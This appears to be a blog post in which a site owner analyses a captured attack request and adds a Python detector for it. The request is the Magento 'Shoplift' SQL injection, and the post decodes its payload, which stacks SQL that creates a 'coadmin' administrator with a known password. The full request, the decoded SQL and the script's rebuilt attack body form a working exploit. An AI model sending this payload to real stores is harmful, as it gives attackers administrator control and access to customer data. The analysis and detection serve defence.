Attacker attempting a SQL injection via POST /admin/Cms_Wysiwyg/directive/index/ request
I’ve only seen this attack twice in the past six months (as far back as I keep logs). The first was on 2015-09-15 from the domain qs.biz in Russia (RU). The most recent was today, 2015-09-24, from gigaboxhosting.net in the US. This was the request:
POST /admin/Cms_Wysiwyg/directive/index/ HTTP/1.1
Host: www.skepticism.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2;
Accept: */*
Content-Length: 1349
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------daadfd20bc730c50

--------------------------daadfd20bc730c50
Content-Disposition: form-data; name="filter"

cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTM…
--------------------------daadfd20bc730c50
Content-Disposition: form-data; name="___directive"

e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ==
--------------------------daadfd20bc730c50
Content-Disposition: form-data; name="forwarded"

1
--------------------------daadfd20bc730c50--
The ___directive value decodes to:

{{block type=Adminhtml/report_search_grid output=getCsvFile}}

The filter value decodes to (one statement per line here; the original is a single line):

popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);
SET @SALT = \t'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , 'ganteng123') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','039efceb0a7b17b@telekpitekwashere.cok','coadmin',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = 'coadmin'),'Firstname');
A Google search identifies the target: this is the Magento e-commerce platform, and the vulnerability has already been fixed. The endpoint /admin/Cms_Wysiwyg/directive/index/, the ___directive value that makes the template engine instantiate an Adminhtml report grid block and call its getCsvFile method, and the popularity[field_expr] filter parameter are the ingredients of the Magento SQL injection widely known as "Shoplift" (CVE-2015-1397), which Magento patched in February 2015 as SUPEE-5344; a store with that patch applied is not affected by this request. The payload works by closing a parenthesis in the query the grid builds from the from/to bounds with 0) and then stacking its own statements after a semicolon. It inserts a row into admin_user with username coadmin, is_active set to 1, an extra column copied from an existing administrator so the row looks normal, and a password column built as MD5(salt + password) followed by ':' and the salt, which is the legacy Magento 1 admin hash format, so the value is accepted at login. A second INSERT into admin_role with parent_id 1 (the Administrators role on a stock install), tree_level 2 and role_type 'U' attaches the new user to that role. The attacker is clearly trying to create an administrator account with a password that they know ("ganteng123") in order to gain control of the site.
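To make the analysis above repeatable against logged requests, here is an added Python example (not code from the original post or from Magento) that rebuilds this request body, decodes both base64 fields, flags the stacked SQL in popularity[field_expr], and computes the admin password hash the injected CONCAT(MD5(...)) would store. Assumptions: the multipart body and a benign control request are constructed here from the values quoted on this page; the filter field is re-encoded from the decoded SQL because the page shows its base64 form only truncated; the hash routine follows Magento 1's legacy md5(salt . password) ':' salt format; the detection heuristics (numeric-only bounds, statement splitting on ';') are my own and are tuned to this payload.

```python
import base64
import hashlib
import json
import re
from urllib.parse import unquote_plus

# Constructed sample built from the values quoted on this page. The base64
# `filter` value is re-encoded from the decoded SQL the page prints in full
# (the page shows a tab before 'rp', reproduced here).
BOUNDARY = "------------------------daadfd20bc730c50"
DIRECTIVE_B64 = ("e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQg"
                 "b3V0cHV0PWdldENzdkZpbGV9fQ==")
DECODED_FILTER = (
    "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);"
    "SET @SALT = \t'rp';"
    "SET @PASS = CONCAT(MD5(CONCAT( @SALT , 'ganteng123') ), CONCAT(':', @SALT ));"
    "SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;"
    "INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,"
    "`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,"
    "`rp_token_created_at`) VALUES ('Firstname','Lastname',"
    "'039efceb0a7b17b@telekpitekwashere.cok','coadmin',@PASS,NOW(),0,0,1,@EXTRA,"
    "NULL, NOW());"
    "INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,"
    "role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user "
    "WHERE username = 'coadmin'),'Firstname');"
)
SQL_KEYWORDS = re.compile(r"\b(INSERT|UPDATE|DELETE|SET|SELECT|UNION|DROP)\b", re.I)
CRED_RE = re.compile(
    r"SET\s+@SALT\s*=\s*'([^']*)'.*?MD5\(\s*CONCAT\(\s*@SALT\s*,\s*'([^']*)'\s*\)",
    re.I | re.S)
TABLE_RE = re.compile(r"\b(?:INTO|FROM)\s+`?(\w+)`?", re.I)
USERNAME_RE = re.compile(r"\busername\s*=\s*'([^']*)'", re.I)


def build_body(fields, boundary):
    """Serialise text fields as multipart/form-data, as the captured request was sent."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
             for n, v in fields.items()]
    return "".join(parts) + f"--{boundary}--\r\n"


CAPTURED_BODY = build_body({
    "filter": base64.b64encode(DECODED_FILTER.encode()).decode(),
    "___directive": DIRECTIVE_B64,
    "forwarded": "1",
}, BOUNDARY)
# Constructed control case: the numeric bounds a legitimate report filter carries.
BENIGN_BODY = build_body({
    "filter": base64.b64encode(b"popularity[from]=0&popularity[to]=3").decode(),
    "forwarded": "1",
}, BOUNDARY)


def parse_multipart(body, boundary):
    """Return {field name: value} for the text parts of a multipart/form-data body."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if not part or part == "--":      # leading empty chunk / closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        m = re.search(r'name="([^"]+)"', headers)
        if m:
            fields[m.group(1)] = value
    return fields


def parse_form_urlencoded(qs):
    """Split on '&' only: parse_qs changed its ';' handling across Python
    releases, and ';' is exactly the character this injection relies on."""
    pairs = []
    for chunk in qs.split("&"):
        if chunk:
            key, _, value = chunk.partition("=")
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def find_injection(pairs):
    """The grid expects numeric bounds; a value that closes a parenthesis and stacks
    more statements is the injection. Splitting on ';' ignores quoting, which is
    enough for this payload but not a general SQL tokenizer."""
    for key, value in pairs:
        if key.startswith("popularity[") and not re.fullmatch(r"\d*", value):
            statements = [s.strip() for s in value.split(";") if s.strip()]
            if len(statements) > 1 and SQL_KEYWORDS.search(value):
                return key, statements
    return None, []


def magento1_hash(password, salt):
    """Magento 1 legacy admin hash md5(salt . password) ':' salt, i.e. what the
    injected CONCAT(MD5(CONCAT(@SALT, ...)), CONCAT(':', @SALT)) computes in MySQL."""
    return hashlib.md5((salt + password).encode()).hexdigest() + ":" + salt


def magento1_verify(password, stored):
    """Mirror of the login check: split the stored value on ':' and recompute."""
    digest, _, salt = stored.partition(":")
    return hashlib.md5((salt + password).encode()).hexdigest() == digest


def analyze_request(body, boundary):
    """Decode both base64 fields and report what the request is trying to do."""
    fields = parse_multipart(body, boundary)
    report = {"suspicious": False, "reasons": []}
    directive = base64.b64decode(fields.get("___directive", "")).decode(errors="replace")
    report["directive"] = directive
    if re.search(r"\{\{\s*block\b", directive):
        report["suspicious"] = True
        report["reasons"].append("___directive instantiates an Adminhtml block")
    filter_qs = base64.b64decode(fields.get("filter", "")).decode(errors="replace")
    param, statements = find_injection(parse_form_urlencoded(filter_qs))
    report["injected_param"], report["statements"] = param, statements
    if param:
        report["suspicious"] = True
        report["reasons"].append(f"stacked SQL statements in {param}")
        sql = ";".join(statements)
        report["tables"] = sorted({t.lower() for t in TABLE_RE.findall(sql)})
        cred = CRED_RE.search(sql)
        if cred:
            report["salt"], report["password"] = cred.group(1), cred.group(2)
            report["stored_hash"] = magento1_hash(report["password"], report["salt"])
        user = USERNAME_RE.search(sql)
        report["username"] = user.group(1) if user else None
    return report


if __name__ == "__main__":
    print(json.dumps(analyze_request(CAPTURED_BODY, BOUNDARY), indent=2))
```

Run it as a script to print the report for the captured body; the same analyze_request call can be fed bodies pulled from a web server's request log. Note that the decoded directive is the first signal: a legitimate WYSIWYG preview never needs to instantiate a report grid, so that check alone would catch this probe even if the SQL were obfuscated further.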
This attack against my server is more sophisticated than the majority of attacks I’ve seen. It’s a variation of a SQL injection attack most notably illustrated by Randall Munroe in his XKCD cartoon “Exploits of a Mom”.